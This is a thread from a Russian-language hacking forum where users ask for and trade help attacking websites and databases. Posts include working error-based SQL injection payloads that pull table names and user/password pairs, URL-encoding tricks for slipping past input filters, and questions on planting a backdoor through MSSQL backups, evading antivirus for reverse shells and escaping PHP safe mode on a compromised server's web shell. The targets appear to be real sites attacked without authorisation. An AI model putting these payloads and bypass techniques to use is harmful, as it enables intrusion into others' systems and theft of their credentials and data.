Старый 09.12.2013, 19:08   #3081
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

форумчане, прошу вашей помощи, имеется доступ к бд mssql но нет прав на excec, могу делать бэкап в сетевую папку, пробовал в бэкдор сувать в имя таблицы и в имя колонки, а потом делать бэкап, но не выходит, он как будто в txt формате открывается, либо в кодировка может не та, вообщем не исполняется. пробовал в разные папки и сайты тоже самое.
при всем этом через microsoft sql server 2008 при создании бэкапа когда выбираешь путь паки куда сохранять, я могу лазить по папкам сетевого ресурса и смотреть имена файлов,

Последний раз редактировалось z0mbie; 09.12.2013 в 19:33..
z0mbie вне форума   Ответить с цитированием
Старый 17.12.2013, 00:49   #3082
fesssti
 
Аватар для fesssti
 
Регистрация: 09.09.2012
Сообщений: 1
Репутация: 0
По умолчанию усиление sql запроса

Всем доброго времени суток.
Прошу совета у знающих , имею инж http://www.site.com/prod/?id=40/*! or (select count(*) from information_schema.columns group by concat(user(),floor(rand(0)*2)))*/+--+

не могу взять в толк, чем в место floor(rand(0)*2))) можно усилить запрос?
fesssti вне форума   Ответить с цитированием
Старый 17.12.2013, 17:20   #3083
ksenofor
 
Регистрация: 17.12.2013
Сообщений: 1
Репутация: 0
По умолчанию

Всем привет.

Хочу узнать, как можно обходить антивирусы, при создании реверс шеллов - какие программы для этого используются?
ksenofor вне форума   Ответить с цитированием
Старый 20.12.2013, 20:34   #3084
Tim
 
Аватар для Tim
 
Регистрация: 24.03.2011
Сообщений: 59
Репутация: 3
По умолчанию

hi all
Mysql 5.5.34-cll

lower_case_table_names=0
Т.е. название таблиц регистро зависимо.

Уязвимый параметр переводится в верхний регистр

Цитата:
script.php?user=-1'+select+user+from+users--+
Error
Цитата:
Base table or view not found: 1146 Table 'db.USERS' doesn't exist
Можно это обойти?
Tim вне форума   Ответить с цитированием
Старый 21.12.2013, 00:00   #3085
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

может через error-based проще будет?
faza02 вне форума   Ответить с цитированием
Старый 21.12.2013, 07:38   #3086
Tim
 
Аватар для Tim
 
Регистрация: 24.03.2011
Сообщений: 59
Репутация: 3
По умолчанию

Цитата:
Сообщение от faza02 Посмотреть сообщение
может через error-based проще будет?
из information_schema инфу выводит, а с рабочей базы не хочет
good query
Цитата:
' or 1 group by concat((select concat_ws(',',TABLE_NAME,COLUMN_NAME) from information_schema.columns where TABLE_SCHEMA<>'information_schema' limit 0,1),floor(rand(0)*2)) having min(0) or 1--
error query
Цитата:
' or 1 group by concat((select concat_ws(',',user,pass) from users limit 0,1),floor(rand(0)*2)) having min(0) or 1--
без разницы через что, одна и таже ошибка
Tim вне форума   Ответить с цитированием
Старый 27.12.2013, 23:49   #3087
Faaax
 
Аватар для Faaax
 
Регистрация: 03.04.2012
Сообщений: 94
Репутация: 6
По умолчанию

Ребят выручайте.
Имеется шелл Linux solnet 2.6.26-2-686 #1 SMP Wed Sep 21 04:35:47 UTC 2011 i686
в Disabled PHP Functions: none
Но такая проблема SAFE MODE:ON OPEN BASEDIR:YES бек берётся только через php но при выполнении того же id ничего не выводится
Файлы льются только через админку,через шелл могу смотреть корень файлов и то не всё выводится
Файлы не читаются кроме как phpinfo();
Подскажите как можно сделать либо бек нормальный либо файлы конфигов хоть прочитать?
Уже 2 день голову ломаю.
И да через админку файлы льются,но делается rename файлов
Хотел .htaccess залить чтоб через перл всё сделать,но увы борода(
Faaax вне форума   Ответить с цитированием
Старый 08.01.2014, 22:11   #3088
azid
 
Регистрация: 21.10.2010
Сообщений: 61
Репутация: 1
По умолчанию

Выручайте
Долблюсь уже прилично времени с фильтром
Имеется 5.5.1 и заковыристый фильтр
Реагирует на . и все что после нее идет,т.е запрос information_schema.tables отрезается и идет редик
отдельно information_schema проходит, отдельно . (точка) в запросе проходит тоже,а вот .t (или любой другой символ после) рубится намертво и редик идет
пробовал отрезать после . %20 %09 %0A - редик,пробовал %00 с ним валится 400 эррор
Help

Последний раз редактировалось azid; 08.01.2014 в 22:13..
azid вне форума   Ответить с цитированием
Старый 08.01.2014, 22:48   #3089
kingbeef
 
Регистрация: 28.10.2011
Сообщений: 17
Репутация: 0
По умолчанию

Попробуй так
information_schema%252e%74ables
kingbeef вне форума   Ответить с цитированием
Старый 08.01.2014, 23:11   #3090
azid
 
Регистрация: 21.10.2010
Сообщений: 61
Репутация: 1
По умолчанию

Пробовал,неале...ток зашел написать что это пробовал
Добавление mq=off
При чем странно,union+select+1111,'information_sche ma%2Etables' проходит нормально и вывод как положено information_schema.tables,но при запросе +from+information_schema%2Etables валится редик...фильтра на from нет

ЗЫ:чтоб не плодить посты ответ к посту ниже,нет не работает...

Последний раз редактировалось azid; 08.01.2014 в 23:40..
azid вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot